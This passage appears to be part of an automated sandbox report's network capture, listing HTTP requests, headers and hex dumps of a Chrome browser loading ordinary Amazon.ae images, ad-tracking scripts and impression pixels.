                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC14753INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC16193INData Raw: 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 2c 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 7d 60 29 7d 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 73 2c 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 2c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 69 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 2c 5f 65 3d 65 3d 3e 7b 69 66 28 6e 75 6c 6c 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 63 6f 6e 73 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68
                                                                                                                                                                                                                                                                      Data Ascii: ext/javascript;charset=UTF-8,${encodeURIComponent(t)}`)}null===(t=e.parentNode)||void 0===t||t.insertBefore(s,e.nextSibling),null===(i=e.parentNode)||void 0===i||i.removeChild(e)},_e=e=>{if(null==document.documentElement){const e=document.createElement("h


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      81192.168.2.54979718.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC388OUTGET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC878INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                      Content-Length: 538
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: e5f378af-97f3-4470-a3b0-8eb374a6cbfb
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 11 May 2020 07:06:36 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-148,/images/G/01/ad-feedback/info_icon_1Xsprite
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-148 /images/G/01/ad-feedback/info_icon_1Xsprite
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 08:50:18 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=86400,public
                                                                                                                                                                                                                                                                      Expires: Wed, 21 Aug 2024 08:49:15 GMT
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 97f993f9d41d16f3f36b8c466857e2d6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 39253
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: cY4OP_8c1JZe-lWgMxqa9g3QjvyS8UvBLwkhhzlLtlifJCK2fv_uKg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC538INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0d 00 00 00 19 08 06 00 00 00 ea ac a4 f1 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 e4 05 0b 07 06 05 7d 9f be c9 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 01 a7 49 44 41 54 38 cb 9d 92 b1 6e c2 30 14 45 d3 56 ed d6 09 c6 4a fd 88 fe 40 db 15 a9 1b 08 16 06 16 be 00 66 26 10 08 09 27 40 10 5b 99 32 30 32 f0 11 64 88 fa 13 24 2a 5b 3a 22 b9 f7 56 76 ea 98 80 aa 5a ba 7a b1 fd 4e ee b3 9f 1d c7 18 ad 56 eb 71 36 9b b9 be ef 87 50 ca b8 58 2c c4 72 b9 2c 3b 45 a3 d3 e9 bc b9 ae 9b 4c a7 53 89 c4 23 b4 63 04 c8 79 0c 3d e7 80 27 8c d1 68 f4 29 84 90 84 e0 e6 21 c9 01 e0 11 d2 60 ce b1 db ed be 03 92 93 c9 e4 07 42 52 84 84 0a 12 23 0d 29
                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRpHYstIME}bKGDIDAT8n0EVJ@f&'@[202d$*[:"VvZzNVq6PX,r,;ELS#cy='h)!`BR#)


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      82192.168.2.549804151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC455OUTGET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Outdoor_EN_1x._SY116_CB567104843_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3952
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 79dc0f0d-3f16-4229-aadf-1509f1ad4ba7
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 07:30:47 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:58:54 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 455390
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200054-IAD, cache-nyc-kteb1890022-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff dd 00 04 00 0c ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 00 74 00 ba 03 00 22 00 01 11 01 02 11 01 ff c4 00 a4 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 04 05 02 01 08 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 06 10 00 02 01 03 03 02 03 04 05 08 08 07 00 00 00 00 01 02 03 00 04 05 06
                                                                                                                                                                                                                                                                      Data Ascii: #"""#''''''''''!! !!''''''''''Adobedt"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 02 42 f6 51 b9 63 58 ef f1 ba 8b 44 e4 62 ea 3b 59 dc b2 f5 21 9a 07 dd 59 77 ee 37 1e bd fd 54 d6 bd 20 f9 71 27 1a 16 b8 0d 5e d5 08 b8 5f fb 79 7f 41 86 c4 5b 5a c9 65 6f 61 6f 1d ac dd a6 81 62 40 8f fc 6b b6 cd f7 d6 7b 4b 2b 3b 08 ba 16 36 f1 5a c3 b9 6e 94 08 b1 ae e7 d4 f1 40 06 f5 c6 d1 ba 87 fa 4b 83 8a fe 40 16 e9 18 c3 76 ab d8 75 14 03 ba fc 99 48 35 20 a9 05 88 b8 94 2a 07 56 64 72 6e 0e 73 ce 29 4a 56 66 91 4a 52 91 14 a5 29 11 4a 52 91 3f ff d2 b6 69 4a 57 4e 79 28 a5 29 48 8a 52 94 88 a5 29 48 9a 39 9c 72 65 b1 57 98 d9 1b 82 dd 44 d1 f3 fa a4 8e cd f7 1e f5 f9 e2 d6 f3 21 a5 b3 46 6b 29 e3 37 36 6e c9 d4 89 84 91 48 3d 08 dc 76 65 61 ff 00 c0 d5 cd e2 55 f5 cd 8e 94 b8 36 ac 51 ae 1d 20 91 d7 d4 23 93 cb bf cc 0e 3f 7d 57 be 17 41 88 b8
                                                                                                                                                                                                                                                                      Data Ascii: BQcXDb;Y!Yw7T q'^_yA[Zeoaob@k{K+;6Zn@K@vuH5 *Vdrns)JVfJR)JR?iJWNy()HR)H9reWD!Fk)76nH=veaU6Q #?}WA
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1196INData Raw: 65 69 ee 31 56 72 ca e7 77 92 4b 78 99 98 fc 4b 32 92 6b 4d 87 b6 5c 3a b4 62 49 42 0b 29 53 c1 bf 76 e1 86 90 5c a5 fd 94 3e 26 e0 ef e7 bb 84 5a 79 02 c6 f1 9d 16 22 1a 3b 90 ad cf 7e 3b 31 3d bb d6 7d 04 63 b8 d5 1a 96 fb 1a 3f e5 52 48 16 37 41 b4 6c fc 8b 6e a3 b0 f8 9f be a6 93 60 30 57 1d 3f 31 8c b4 97 a2 82 28 ba 90 46 dc 23 5d f8 a2 f2 53 b2 8d fb 01 5b 96 f6 d6 f6 91 2c 16 b0 a4 10 a7 64 8a 25 08 a3 ec 55 00 56 42 9b df be f2 36 d4 29 a7 b4 29 b9 40 99 e1 60 db af e3 32 d2 95 8e 79 e2 b5 82 5b 9b 87 11 c3 0a 34 92 b9 f4 55 51 c9 98 fd 80 56 f2 b0 04 9b 0c de 64 a5 70 31 97 19 ac b6 31 b2 cb 20 b4 6b b5 ea e3 ac dd 14 aa 45 eb 11 9c fd 22 d2 2e c5 b6 23 8e ff 00 8e fe 17 28 99 9c 65 be 41 50 c4 d2 82 b2 c2 7d 63 96 36 31 cb 19 fe 17 52 2b 50 e0
                                                                                                                                                                                                                                                                      Data Ascii: ei1VrwKxK2kM\:bIB)Sv\>&Zy";~;1=}c?RH7Aln`0W?1(F#]S[,d%UVB6))@`2y[4UQVdp11 kE".#(eAP}c61R+P


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      83192.168.2.54981252.94.222.1274432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC609OUTGET /e/xsp/imp?b=RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC323INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: 6JFNGCQ01CN3A4S3X5VJ
                                                                                                                                                                                                                                                                      Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      84192.168.2.54980218.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC378OUTGET /images/I/41IU10DZeDL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4545
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 6adc7623-acb8-4d9f-adfe-ad6f51d5adeb
                                                                                                                                                                                                                                                                      Date: Sat, 17 Aug 2024 18:39:09 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 27 Mar 2024 10:43:53 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-773,/images/I/41IU10DZeDL
                                                                                                                                                                                                                                                                      Expires: Fri, 12 Aug 2044 18:39:09 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-773 /images/I/41IU10DZeDL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 06cdb267b93af0cbfcd6cc564136784a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 269926
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: OYAfBUO8hEilGP6b8RFGsbOgvnySaL4uHdJe_Hhke78se1BfDzhjfw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC4545INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 05 08 02 01 04 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      85192.168.2.54980118.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC375OUTGET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 14535
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 1dfdfc24-e502-4caf-872d-062e795c0ea0
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 10 Mar 2023 01:34:32 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-518,/images/S/sash/-NcRiM84u1IwoUa
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-518 /images/S/sash/-NcRiM84u1IwoUa
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Fri, 12 Jul 2024 09:14:52 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Expires: Wed, 16 Sep 2043 18:23:39 GMT
                                                                                                                                                                                                                                                                      Via: 1.1 c27d2e9d4c6e59d1b92ac8671f0bfb9c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 28890241
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: -xFs-D0Gus1YpUUddf5SRbMw0tnOxjb5YiydltlOc23vYyHxyFi51w==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC14535INData Raw: 47 49 46 38 39 61 32 00 32 00 f4 19 00 fd fe fe ad d0 d5 5d a8 b4 14 87 99 d7 e9 eb f4 f5 f5 3a 97 a6 ec ee ee dd e0 e0 f0 f3 f3 e5 e7 e7 9e c8 cf f9 fb fb e8 ea ea cb d7 d9 c8 e1 e4 8e c1 c9 e2 ef f1 f1 f7 f8 7b b6 c0 ef f0 f0 f6 f7 f7 bc d8 dd 03 7d 91 da de de d9 dd dd d7 db db e0 e3 e3 02 75 8b e5 e3 e2 ec e7 e5 ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a22]:{}u!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      86192.168.2.54980018.239.36.214432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1216OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: 60VQWZMAFP7X1KZRBENN
